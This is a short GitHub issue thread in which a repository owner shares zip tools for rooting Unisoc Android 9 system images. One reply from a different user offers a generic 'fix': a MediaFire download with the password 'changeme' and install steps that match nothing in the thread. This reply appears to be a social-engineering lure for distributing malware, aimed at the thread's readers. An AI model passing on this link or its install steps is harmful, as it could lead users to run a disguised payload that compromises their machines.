### ISSUE TITLE
man！What can I say?

### ISSUE THREAD

**Issue by KawaiiSparkle** [KawaiiSparkle/android_device_unisoc_iflytek_ctg2_t10#1]
[img_editor_for_system_and_vendor.zip](https://github.com/user-attachments/files/16823727/img_editor_for_system_and_vendor.zip)

Root tool For Unisoc(or other Vendors) android 9 SAR layout and also suitable for DSU-Sideloader Systems to use Magisk Root

**Comment by KawaiiSparkle** [comment]
But if U have a boot partition with ramdisk，U needn't to use it

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KawaiiSparkle** [comment]
[auto_ota2img.zip](https://github.com/user-attachments/files/17609675/auto_ota2img.zip)
